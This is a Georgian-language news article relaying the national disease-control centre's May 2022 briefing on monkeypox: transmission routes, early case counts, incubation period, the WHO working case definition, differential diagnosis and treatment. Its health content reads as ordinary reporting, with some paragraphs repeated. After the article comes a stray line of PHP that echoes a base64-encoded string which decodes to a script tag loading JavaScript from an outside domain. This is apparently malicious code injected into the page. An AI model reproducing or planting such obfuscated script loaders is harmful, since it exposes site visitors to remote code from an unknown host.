celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლისა და საზოგადოებრივი ჯანმრთელობის ეროვნული ცენტრის ცნობით, „მაიმუნის ყვავილი“ ზოონოზური დაავადებაა, რომელიც ადამიანებს შორის ვრცელდება რესპირატორული გზით, ინფიცირებულ ბიოლოგიურ სითხეებთან პირდაპირი კონტაქტით ან დაინფიცირებულ საგნებთან შეხებისას.
 
როგორც მათ მიერ გავრცელებულ ინფორმაციაშია აღნიშნული, 22 მაისის მდგომარეობით, მსოფლიოში იდენტიფიცირებულია „მაიმუნის ყვავილის“ 92 დადასტურებული და 28 სავარაუდო შემთხვევა (უპირატესად ევროპაში), რომლებშიც ჯერჯერობით არ ვლინდება მოგზაურობის ისტორია დაავადების ენდემურ ქვეყნებში.
 
მათი განმარტებით, საქართველოში „მაიმუნის ყვავილით“ გამოწვეული გარდაცვალების არცერთი შემთხვევა ჯერ არ დაფიქსირებულა.
 
„მაიმუნის ყვავილით“ ადამიანის დაავადების პირველი შემთხვევა 1970 წელს, კონგოს დემოკრატიულ რესპუბლიკაში აღწერეს. „მაიმუნის ყვავილი“ ზოონოზური დაავადებაა, რომელიც ადამიანს უპირატესად მღრნელებისა და პრიმატებისგან გადაეცემა. ადამიანებს შორის ვრცელდება რესპირატორული გზით, ინფიცირებულ ბიოლოგიურ სითხეებთან პირდაპირი კონტაქტით ან დაინფიცირებულ საგნებთან შეხებისას. გადაცემის შემთხვევები ასევე აღწერილია არასაკმარისად დაუმუშავებელი ხორც-პროდუქტების მიღებისას.
 
2022 წლის 22 მაისის მდგომარეობით, მსოფლიოში იდენტიფიცირებულია „მაიმუნის ყვავილის“ 92 დადასტურებული და 28 სავარაუდო შემთხვევა (უპირატესად ევროპაში), რომლებშიც ჯერჯერობით არ ვლინდება მოგზაურობის ისტორია დაავადების ენდემურ ქვეყნებში. „მაიმუნის ყვავილით“ გამოწვეული გარდაცვალების არცერთი შემთხვევა ჯერ არ დაფიქსირებულა.
 
2021 წელს ოთხი კონტინენტის 15 ქვეყანაში დაფიქსირდა ადამიანების „მაიმუნის ყვავილით“ დაინფიცირების შემთხვევები, რომელთა უმრავლესობა დაფიქსირდა „მაიმუნის ყვავილის“ ენდემურ ქვეყნებში: ნიგერია, ცენტრალური აფრიკის რესპუბლიკა, კამერუნი და კონგოს დემოკრატიული რესპუბლიკა.
 
„მაიმუნის ყვავილის“ კლინიკა უპირატესად „ყვავილის“ კლინიკის მსგავსია, თუმცა გაცილებით მსუბუქად მიმდინარეობს. ინკუბაციური პერიოდი 5-დან 21-დღემდეა (უპირატესად 7-14 დღე).
 
ამ ეტაპზე ჯანმრთელობის მსოფლიო ორგანიზაციის (ჯანმო) მიერ განსაკუთრებული ყურადღება ეთმობა სავარაუდო შემთხვევების გამოვლენას. ჯანმო-ს მიერ შემუშავებულია „მაიმუნის ყვავილის“ შემთხვევის განსაზღვრების სამუშაო ვერსია:
 
ცხელებით (>38.3⁰C) მიმდინარე მწვავე დაავადება, რომელსაც თან ახლავს თავის ძლიერი ტკივილი, ლიმფოადენოპათია, წელის ტკივილი, მიალგია, ძლიერი სისუსტე და 1-3 დღის შემდეგ განვითარებული პროგრესული გამონაყარი, რომელიც ხშირად სახიდან იწყება და შემდეგ ვრცელდება სხეულის სხვა ნაწილებზე, ფეხის ტერფებსა და ხელის გულებზე. გამონაყარი იწყება მაკულებით, რომლებიც გარდაიქმნება პაპულებად, ვეზიკულებად, პუსტულებად და შემდეგ ქერქად.
 
შესაძლო შემთხვევის განსაზღვრებასთან თავსებადია შემთხვევა, რომელიც არ არის ლაბორატორიულად დადასტურებული, მაგრამ გააჩნია ეპიდემიოლოგიური კავშირი დადასტურებულ ან სავარაუდო შემთხვევასთან.
 
აღსანიშნავია, რომ ევროპის ქვეყნებში დაფიქსირებული შემთხვევების უმეტესობა ჰომო- ან ბისექსუალია, რის გამოც დიდი მნიშვნელობა ენიჭება შემთხვევის სექსუალური ორიენტაციის დადგენას. მათ ნაწილს აღენიშნება გამონაყარი გენიტალურ ან / და პერიანალურ არეებში. შესაძლო ან სავარაუდო შემთხვევების აღმოჩენის შემთხვევაში, კონტაქტებისა და დაავადების წყაროს დადგენის გარდა, აუცილებელია დიფერენციალური დიაგნოზის გატარება ჩუტყვავილასთან, „წითელასთან“, მარტივ ჰერპესვირუსულ ინფექციასთან, სიფილისთან და სამკურნალო პრეპარატების მოხმარებით გამოწვეულ ალერგიასთან. ნატურალური „ყვავილის“ საწინააღმეგო აცრა საკმაოდ ეფექტიანად იცავდა „მაიმუნის ყვავილის“ ვირუსისგანაც. მკურნალობა შესაძლებელია „ყვავილის“ საწინააღმდეგო პრეპარატებით“,-აღნიშნულია ინფორმაციაში.
522
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");